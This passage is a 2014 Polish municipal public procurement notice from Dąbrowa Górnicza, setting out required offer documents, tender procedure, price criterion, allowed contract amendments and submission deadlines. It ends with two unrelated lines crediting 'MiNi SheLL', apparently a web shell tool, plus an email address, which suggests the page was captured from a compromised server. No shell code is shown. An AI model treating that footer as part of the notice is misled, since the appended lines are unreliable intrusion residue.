<p>1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b Ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.Zamawiający przewiduje możliwości dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy:
1. zmiany terminu wykonania zamówienia, w następujących przypadkach:
1.1.wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu, lub inne okoliczności niezależne od Zamawiającego, w tym takie, których Zamawiający przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć; wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie zamówienia, np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim,
1.2. konieczności wykonania zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,
2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1.zmiany przepisów prawa istotnych dla postanowień zawartej umowy,
2.2. zmiany stawki podatku VAT tj.:
a)w przypadku zwiększenia stawki podatku VAT ceny jednostkowe brutto nie mogą być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy,
b)w przypadku zmniejszenia stawki podatku VAT ceny jednostkowe brutto zostaną odpowiednio pomniejszone w odniesieniu do cen zadeklarowanych w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.
II. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
III.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
IV. Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
V. Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7 do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Gospodarki Nieruchomościami , pok. nr 231 ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2014 godzina 10:00, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Zamówienie nie jest finansowane ze środków Unii Europejskiej.
II. Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.
III. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia
1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w pkt 8 SIWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w pkt 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.2. i 9.3. SIWZ, podpisane przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Oświadczenie wymienione w pkt 9.1.1 oraz dokumenty wymienione w 9.1.2. i 9.1.3. SIWZ, formularz ofertowy wymieniony w pkt 9.4.1. SIWZ składają wszyscy Wykonawcy wspólnie na jednym druku lub pełnomocnik w imieniu wszystkich Wykonawców. 
3. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
4. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.
IV. Uszczegółowienie sekcji II.2 niniejszego ogłoszenia: Czas trwania zamówienia lub termin wykonania: 31.12.2014 r. lub do wyczerpania maksymalnej nominalnej wartości umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com